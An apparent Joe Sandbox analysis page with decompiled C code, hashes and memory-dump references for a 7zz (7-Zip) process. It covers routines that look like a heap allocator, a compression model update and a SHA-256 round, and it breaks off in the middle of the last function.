Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
Instruction ID: 9bb6accf8b061612f2bcebb0087019938af92876cfc06ddf3499721ed1c01372
Opcode Fuzzy Hash: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
Instruction Fuzzy Hash: EEA107317483444BFF389E28D8513EEB7D2EBC4308F54443EDA898B781DA7AA9198756

Uniqueness

Uniqueness Score: -1.00%

Function 0046F314 Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0046F314(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x0046f31a
0x0046f323
0x0046f32e
0x0046f331
0x0046f334
0x0046f346
0x0046f34c
0x0046f34f
0x0046f352
0x0046f356
0x0046f35a
0x0046f35d
0x0046f4c2
0x0046f4c8
0x0046f4cb
0x0046f4ce
0x0046f4d1
0x0046f4d4
0x0046f4db
0x0046f4e1
0x0046f4e2
0x0046f4e5
0x0046f4e8
0x0046f4ec
0x0046f4ec
0x0046f4ed
0x0046f4f1
0x0046f4fd
0x0046f4fe
0x0046f501
0x0046f505
0x0046f505
0x0046f509
0x0046f50c
0x0046f50e
0x0046f511
0x0046f531
0x0046f53b
0x0046f53b
0x0046f53f
0x0046f541
0x0046f548
0x0046f548
0x0046f54a
0x0046f54c
0x0046f54f
0x0046f54f
0x0046f54f
0x0046f54f
0x0046f513
0x0046f51c
0x0046f520
0x0046f522
0x0046f526
0x0046f526
0x0046f528
0x0046f52d
0x0046f52d
0x0046f528
0x0046f552
0x0046f552
0x0046f55b
0x0046f564
0x0046f56a
0x0046f56d
0x0046f573
0x0046f574
0x0046f577
0x0046f57b
0x0046f57b
0x0046f577
0x0046f57c
0x0046f583
0x0046f586
0x0046f589
0x0046f58c
0x0046f592
0x0046f598
0x0046f59b
0x0046f59d
0x0046f5a1
0x0046f5a4
0x0046f5a7
0x0046f5a7
0x0046f5a9
0x0046f5ad
0x0046f5d0
0x0046f5d4
0x0046f5e0
0x0046f5e3
0x0046f5e3
0x0046f5e3
0x0046f5e3
0x0046f5e6
0x0046f5ed
0x0046f5f0
0x0046f5af
0x0046f5af
0x0046f5b3
0x0046f5be
0x0046f5c1
0x0046f5c1
0x0046f5c1
0x0046f5c3
0x0046f5c7
0x0046f5cc
0x0046f5cc
0x0046f5f7
0x0046f5f7
0x0046f5f7
0x0046f5f9
0x0046f5fc
0x0046f5fe
0x0046f5fe
0x0046f602
0x0046f604
0x00000000
0x0046f604
0x0046f366
0x00000000
0x0046f376
0x0046f37c
0x0046f380
0x0046f383
0x0046f387
0x0046f388
0x0046f388
0x0046f391
0x0046f396
0x0046f3c4
0x0046f3c8
0x0046f3ca
0x0046f3d1
0x0046f3d1
0x0046f3d3
0x0046f3d5
0x0046f3d8
0x0046f3d8
0x0046f3d8
0x0046f3d8
0x0046f398
0x0046f3a2
0x0046f3a6
0x0046f3a8
0x0046f3ac
0x0046f3ae
0x0046f3b3
0x0046f3b3
0x0046f3ae
0x0046f396
0x0046f3e1
0x0046f3ea
0x0046f3f2
0x0046f3f9
0x0046f4a9
0x0046f3ff
0x0046f408
0x0046f409
0x0046f410
0x0046f414
0x0046f414
0x0046f418
0x0046f41b
0x0046f421
0x0046f424
0x0046f427
0x0046f42a
0x0046f430
0x0046f439
0x0046f43b
0x0046f442
0x0046f445
0x0046f447
0x0046f44b
0x0046f46e
0x0046f472
0x0046f474
0x0046f47e
0x0046f481
0x0046f481
0x0046f481
0x0046f481
0x0046f484
0x0046f48b
0x0046f48b
0x0046f48e
0x0046f44d
0x0046f451
0x0046f45f
0x0046f45f
0x0046f461
0x0046f465
0x0046f46a
0x0046f46a
0x0046f495
0x0046f495
0x0046f497
0x0046f49a
0x0046f49d
0x0046f4a1
0x0046f4a3
0x0046f4a3
0x0046f4ac
0x0046f4af
0x0046f4b2
0x00000000
0x0046f4b2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: cf6b0b7c12e853c3d5f2bfce7b0d2bdeef6eab3eb2089ac6725cfe266f892559
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: A9B19F71A0020ADFDB15CF04D5D0AA9BBA1FF58318F24C1AEC85A4B742E735EE46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00453CE0 Relevance: .2, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00453CE0(intOrPtr* __ecx) {
				signed int _t100;
				signed int _t108;
				signed int _t109;
				signed int _t114;
				short* _t122;
				void* _t123;
				signed int _t126;
				intOrPtr _t127;
				signed int _t133;
				short* _t136;
				signed int _t140;
				unsigned int _t145;
				signed int* _t147;
				signed int _t149;
				intOrPtr _t151;
				unsigned short _t152;
				void* _t154;
				signed int _t156;
				signed int _t157;
				void* _t160;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				short* _t179;
				signed int _t189;
				short _t195;
				signed int* _t205;
				intOrPtr _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				unsigned short* _t209;
				intOrPtr* _t210;
				void* _t212;

				_t205 =  *(_t212 + 0x20);
				_t208 = __ecx;
				_t133 = _t205[2];
				_t140 =  *((intOrPtr*)(__ecx + 8));
				 *((intOrPtr*)(_t212 + 0x18)) = __ecx;
				_t100 = ((_t133 + 1) * 0 - 1) / _t205[1];
				_t160 = __ecx + 0xa;
				 *(_t212 + 0x24) = 1;
				while(0 > _t100) {
					_t160 = _t160 + 2;
					 *(_t212 + 0x24) =  *(_t212 + 0x24) + 1;
				}
				_t26 =  *_t205 - 1; // -1
				_t189 = 0 * _t205[1] / _t140 + _t26;
				_t108 = 0 * _t205[1] / _t140;
				_t205[2] = _t133 - _t108;
				 *_t205 =  *_t205 + _t108;
				while(1) {
					_t109 =  *_t205;
					if(((_t109 ^ _t189) & 0x00000080) == 0) {
						goto L7;
					}
					if((_t109 & 0x00000040) != 0 && (_t189 & 0x00004000) == 0) {
						_t189 = _t189 | 0x00004000;
						 *_t205 = _t109 & 0x00003fff;
						goto L7;
					}
					_t149 =  *(_t212 + 0x24) - 1;
					_t205[1] = _t189 -  *_t205 + 1;
					_t206 = 0;
					_t122 = _t208 + 8 + _t149 * 2;
					 *((intOrPtr*)(_t212 + 0x1c)) = 0;
					do {
						 *_t122 =  *_t122 + 8;
						_t174 = _t149;
						_t149 = _t149 - 1;
						_t122 = _t122 - 2;
					} while (_t174 != 0);
					_t123 = _t208 + 8;
					if( *((short*)(_t208 + 8)) <= 0xed8) {
						L36:
						return _t206;
					} else {
						_t151 =  *((intOrPtr*)(_t208 + 4)) - 1;
						 *((intOrPtr*)(_t208 + 4)) = _t151;
						if(_t151 != 0) {
							_t126 =  *_t208 - 1;
							_t209 = _t208 + 8 + _t126 * 2;
							do {
								 *_t209 =  *_t209 >> 1;
								_t152 = _t209[1];
								if( *_t209 <= _t152) {
									 *_t209 = _t152 + 1;
								}
								_t176 = _t126;
								_t126 = _t126 - 1;
								_t209 = _t209 - 2;
							} while (_t176 != 0);
							goto L36;
						} else {
							_t154 = 0;
							 *((intOrPtr*)(_t208 + 4)) = 0x32;
							if( *_t208 > 0) {
								do {
									_t123 = _t123 + 2;
									 *((short*)(_t123 - 2)) = 1 >> 1;
									_t154 = _t154 + 1;
								} while (_t154 <  *_t208);
							}
							_t127 =  *_t208;
							_t178 = 0;
							 *(_t212 + 0x24) = 0;
							_t70 = _t127 - 1; // 0xed5
							if(_t70 > 0) {
								_t157 = 1;
								_t136 = _t208 + 8;
								 *(_t212 + 0x10) = 1;
								_t207 = _t208 + 0x8a;
								 *((intOrPtr*)(_t212 + 0x14)) = _t136;
								do {
									if(_t157 < _t127) {
										_t75 = _t136 + 2; // 0xeda
										_t179 = _t75;
										do {
											_t195 =  *_t136;
											if(_t195 <  *_t179) {
												 *_t136 =  *_t179;
												_t208 =  *((intOrPtr*)(_t212 + 0x18));
												 *_t207 =  *((intOrPtr*)(_t157 + _t208 + 0x8a));
												_t136 =  *((intOrPtr*)(_t212 + 0x14));
												 *_t179 = _t195;
												 *((char*)(_t157 + _t208 + 0x8a)) =  *_t207;
											}
											_t157 = _t157 + 1;
											_t179 = _t179 + 2;
										} while (_t157 <  *_t208);
										_t157 =  *(_t212 + 0x10);
										_t178 =  *(_t212 + 0x24);
									}
									_t127 =  *_t208;
									_t178 = _t178 + 1;
									_t157 = _t157 + 1;
									_t136 = _t136 + 2;
									_t84 = _t127 - 1; // 0xed7
									_t207 = _t207 + 1;
									 *(_t212 + 0x24) = _t178;
									 *(_t212 + 0x10) = _t157;
									 *((intOrPtr*)(_t212 + 0x14)) = _t136;
								} while (_t178 < _t84);
								_t206 =  *((intOrPtr*)(_t212 + 0x1c));
							}
							_t210 = _t208 + 8 + _t178 * 2;
							do {
								_t156 = _t178;
								 *_t210 =  *_t210 +  *((intOrPtr*)(_t210 + 2));
								_t178 = _t178 - 1;
								_t210 = _t210 - 2;
							} while (_t156 != 0);
							return _t206;
						}
					}
					L7:
					 *_t205 = ( *_t205 & 0x00007fff) << 1;
					_t189 = (_t189 & 0x00007fff) << 0x00000001 | 0x00000001;
					if(_t205[4] >= 0x10000) {
						_t114 = _t205[6];
						_t147 =  &(_t205[6]);
						if(_t114 < _t205[7]) {
							 *(_t212 + 0x10) =  *_t114;
							 *_t147 = _t114 + 1;
						} else {
							 *(_t212 + 0x10) = E0040E070(_t147);
						}
						_t205[4] =  *(_t212 + 0x10) & 0x000000ff | 0x00000001;
					}
					_t145 = _t205[4];
					_t205[4] = _t145 + _t145;
					_t205[2] = _t205[2] << 0x00000001 | _t145 >> 0x00000007 & 0x00000001;
				}
			}

0x00453ce6
0x00453cea
0x00453ced
0x00453cf2
0x00453d02
0x00453d06
0x00453d08
0x00453d0d
0x00453d1a
0x00453d20
0x00453d24
0x00453d2d
0x00453d4a
0x00453d4a
0x00453d5b
0x00453d63
0x00453d66
0x00453d6d
0x00453d6d
0x00453d76
0x00000000
0x00000000
0x00453d7b
0x00453d8e
0x00453d94
0x00000000
0x00453d94
0x00453e0c
0x00453e0f
0x00453e19
0x00453e1b
0x00453e1f
0x00453e23
0x00453e23
0x00453e27
0x00453e29
0x00453e2a
0x00453e2d
0x00453e37
0x00453e3a
0x00453f51
0x00453f5a
0x00453e40
0x00453e43
0x00453e44
0x00453e47
0x00453f2c
0x00453f2d
0x00453f31
0x00453f31
0x00453f39
0x00453f40
0x00453f43
0x00453f43
0x00453f47
0x00453f49
0x00453f4a
0x00453f4d
0x00000000
0x00453e4d
0x00453e50
0x00453e54
0x00453e5b
0x00453e5d
0x00453e6a
0x00453e70
0x00453e77
0x00453e78
0x00453e5d
0x00453e7c
0x00453e7f
0x00453e81
0x00453e85
0x00453e8a
0x00453e8c
0x00453e91
0x00453e94
0x00453e98
0x00453e9e
0x00453ea2
0x00453ea4
0x00453ea6
0x00453ea6
0x00453ea9
0x00453ea9
0x00453eaf
0x00453eb6
0x00453eb9
0x00453ec4
0x00453ec6
0x00453eca
0x00453ecd
0x00453ecd
0x00453ed7
0x00453ed8
0x00453edb
0x00453edf
0x00453ee3
0x00453ee3
0x00453ee7
0x00453eea
0x00453eeb
0x00453eec
0x00453eef
0x00453ef2
0x00453ef5
0x00453ef9
0x00453efd
0x00453efd
0x00453f03
0x00453f03
0x00453f07
0x00453f0b
0x00453f0f
0x00453f11
0x00453f15
0x00453f16
0x00453f19
0x00453f26
0x00453f26
0x00453e47
0x00453d96
0x00453da6
0x00453dad
0x00453db2
0x00453db4
0x00453dba
0x00453dbf
0x00453dcf
0x00453dd3
0x00453dc1
0x00453dc6
0x00453dc6
0x00453de1
0x00453de1
0x00453de4
0x00453deb
0x00453dfb
0x00453dfb

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84bed10f144b41eeb8b473e901e51437f86707a423940da72345cc436cd1613
Instruction ID: c740afd1279d8bfa4f4822e581f7384316505ec6ef252f89b0382e259e690309
Opcode Fuzzy Hash: b84bed10f144b41eeb8b473e901e51437f86707a423940da72345cc436cd1613
Instruction Fuzzy Hash: 6D81B1316047468BCB28CF19C54029AB7F2FFD8341F14896EE8998B345E775EA4ACB48

Uniqueness

Uniqueness Score: -1.00%

Function 00467420 Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00467420(intOrPtr* _a4) {
				char _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed char* _t142;
				signed int _t147;
				intOrPtr* _t148;
				signed int _t167;
				signed int _t172;
				intOrPtr* _t179;
				intOrPtr* _t187;
				intOrPtr _t189;
				intOrPtr _t222;
				intOrPtr* _t229;
				signed int _t258;
				void* _t281;

				_t281 =  &_v180;
				_t187 = _a4;
				_t167 = 0;
				_t142 = _t187 + 0x29;
				do {
					 *((intOrPtr*)(_t281 + 0x44 + _t167 * 4)) = (((( *(_t142 - 1) & 0x000000ff) << 8) + ( *_t142 & 0x000000ff) << 8) + (_t142[1] & 0x000000ff) << 8) + (_t142[2] & 0x000000ff);
					 *((intOrPtr*)(_t281 + 0x48 + _t167 * 4)) = ((((_t142[3] & 0x000000ff) << 8) + (_t142[4] & 0x000000ff) << 8) + (_t142[5] & 0x000000ff) << 8) + (_t142[6] & 0x000000ff);
					 *((intOrPtr*)(_t281 + 0x4c + _t167 * 4)) = ((((_t142[7] & 0x000000ff) << 8) + (_t142[8] & 0x000000ff) << 8) + (_t142[9] & 0x000000ff) << 8) + (_t142[0xa] & 0x000000ff);
					 *((intOrPtr*)(_t281 + 0x50 + _t167 * 4)) = ((((_t142[0xb] & 0x000000ff) << 8) + (_t142[0xc] & 0x000000ff) << 8) + (_t142[0xd] & 0x000000ff) << 8) + (_t142[0xe] & 0x000000ff);
					_t167 = _t167 + 4;
					_t142 =  &(_t142[0x10]);
				} while (_t167 < 0x10);
				_v168 =  *_t187;
				_v164 =  *((intOrPtr*)(_t187 + 4));
				_v160 =  *((intOrPtr*)(_t187 + 8));
				_v156 =  *((intOrPtr*)(_t187 + 0xc));
				_v152 =  *((intOrPtr*)(_t187 + 0x10));
				_v148 =  *((intOrPtr*)(_t187 + 0x14));
				_t258 = 0;
				_v144 =  *((intOrPtr*)(_t187 + 0x18));
				_v140 =  *((intOrPtr*)(_t187 + 0x1c));
				_v176 = 0;
				do {
					_t172 = 1;
					_v180 = 0x47c6e0 + _t258 * 4;
					_t189 = 0;
					_v136 = 1;
					_t50 = _t172 - 5; // -4
					_t147 = _t50;
					_v172 = 0;
					_v132 = 0x10;
					do {
						if(_t258 == 0) {
							_t222 =  *((intOrPtr*)(_t281 + _t189 + 0x44));
							 *((intOrPtr*)(_t281 + _t189 + 0x84)) = _t222;
						} else {
							_t53 = _t172 - 3; // -2
							_t60 = _t172 - 1; // 0x0
							asm("ror ebx, 0x13");
							asm("ror ebp, 0x11");
							asm("ror edx, 0x12");
							asm("ror ebp, 0x7");
							_t229 = _t281 + 0x84 + (_t60 & 0x0000000f) * 4;
							 *_t229 =  *_t229 + ( *(_t281 + 0x84 + (_t53 & 0x0000000f) * 4) ^  *(_t281 + 0x84 + (_t53 & 0x0000000f) * 4) ^  *(_t281 + 0x84 + (_t53 & 0x0000000f) * 4) >> 0x0000000a) + ( *(_t281 + 0x84 + (_t172 & 0x0000000f) * 4) ^  *(_t281 + 0x84 + (_t172 & 0x0000000f) * 4) ^  *(_t281 + 0x84 + (_t172 & 0x0000000f) * 4) >> 0x00000003) +  *((intOrPtr*)(_t281 + 0x84 + (_t172 + 0xfffffff8 & 0x0000000f) * 4));
							_t222 =  *_t229;
						}
						_t74 = _t147 + 2; // -2
						_t78 = _t147 + 3; // -1
						asm("ror ebx, 0x19");
						asm("ror ebp, 0xb");
						asm("ror ebp, 0x6");
						_t79 = _t147 + 1; // -3
						_t179 = _t281 + 0x1c + (_t78 & 0x00000007) * 4;
						 *_t179 =  *_t179 + ( *(_t281 + 0x1c + (_t147 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t147 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t147 & 0x00000007) * 4)) + (( *(_t281 + 0x1c + (_t79 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t74 & 0x00000007) * 4)) &  *(_t281 + 0x1c + (_t147 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t74 & 0x00000007) * 4)) +  *_v180 + _t222;
						_t87 = _t147 - 1; // -5
						 *((intOrPtr*)(_t281 + 0x1c + (_t87 & 0x00000007) * 4)) =  *((intOrPtr*)(_t281 + 0x1c + (_t87 & 0x00000007) * 4)) +  *_t179;
						_t97 = _t147 - 4; // -8
						_v180 = _v180 + 4;
						_t103 = _t147 - 3; // -7
						asm("ror edi, 0x16");
						asm("ror ebx, 0xd");
						asm("ror ebx, 0x2");
						_t107 = _t147 - 2; // -6
						_t258 = _v176;
						 *_t179 =  *_t179 + ( *(_t281 + 0x1c + (_t97 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t97 & 0x00000007) * 4) ^  *(_t281 + 0x1c + (_t97 & 0x00000007) * 4)) + ( *(_t281 + 0x1c + (_t107 & 0x00000007) * 4) & ( *(_t281 + 0x1c + (_t103 & 0x00000007) * 4) |  *(_t281 + 0x1c + (_t97 & 0x00000007) * 4)) |  *(_t281 + 0x1c + (_t103 & 0x00000007) * 4) &  *(_t281 + 0x1c + (_t97 & 0x00000007) * 4));
						_t172 = _v136 + 1;
						_t189 = _v172 + 4;
						_t147 = _t147 - 1;
						_t114 =  &_v132;
						 *_t114 = _v132 - 1;
						_v136 = _t172;
						_v172 = _t189;
					} while ( *_t114 != 0);
					_t258 = _t258 + 0x10;
					_v176 = _t258;
				} while (_t258 < 0x40);
				_t148 = _a4;
				 *_t148 =  *_t148 + _v168;
				 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) + _v164;
				 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _v160;
				 *((intOrPtr*)(_t148 + 0xc)) =  *((intOrPtr*)(_t148 + 0xc)) + _v156;
				 *((intOrPtr*)(_t148 + 0x10)) =  *((intOrPtr*)(_t148 + 0x10)) + _v152;
				 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _v148;
